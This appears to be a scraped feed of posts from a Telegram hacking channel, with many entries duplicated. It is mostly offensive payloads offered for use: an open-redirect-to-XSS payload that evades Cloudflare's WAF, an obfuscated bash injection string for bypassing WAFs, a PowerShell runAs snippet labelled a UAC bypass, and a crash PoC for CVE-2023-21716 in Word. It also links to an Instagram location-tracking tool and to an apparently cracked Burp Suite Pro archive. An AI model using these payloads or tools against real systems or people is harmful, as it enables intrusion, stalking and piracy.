[ Bypass Cloudflare ] Open Redirect to XSS
Open Redirect :
Escalate to XSS :
Final payload to bypass the WAF :
#bypass #cloudflare #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Open Redirect :
/login?redirectUrl=//evil,org
--> redirect to evil,orgEscalate to XSS :
/login?redirectUrl=javascript:alert(1)
--> blocked by WAFFinal payload to bypass the WAF :
/login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
--> xss pop-up#bypass #cloudflare #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Bypass 403 (Forbidden) Methodology
6 usefull Trick for bypass the Forbidden admin page...
...::: X P 4 :::...
➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
6 usefull Trick for bypass the Forbidden admin page...
...::: X P 4 :::...
➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Trackgram
Use Instagram location features to track an account
Github
#tools #instagram
——————
0Day.Today
@LearnExploit
@Tech_Army
Use Instagram location features to track an account
Github
#tools #instagram
——————
0Day.Today
@LearnExploit
@Tech_Army
ALL IN ONE INFORMATION GATHERING TOOLS
OSINT.SH
#Osint #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
OSINT.SH
#Osint #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
bash injection bypass waf
——————
0Day.Today
@LearnExploit
@Tech_Army
$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
#bypass #Waf ——————
0Day.Today
@LearnExploit
@Tech_Army
This code will bypass the UAC prompt, running a command as an Administrator.
`command = "insert command here"
process = subprocess.Popen(['powershell.exe', 'Start-Process', command, '-Verb', 'runAs'], stdout=subprocess.PIPE)
process.communicate()[0]`
#UAC #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
`command = "insert command here"
process = subprocess.Popen(['powershell.exe', 'Start-Process', command, '-Verb', 'runAs'], stdout=subprocess.PIPE)
process.communicate()[0]`
#UAC #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
burpsuite_pro_v2023.2.2.zip
563.7 MB
Burp Suite Version 2023.2.2
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army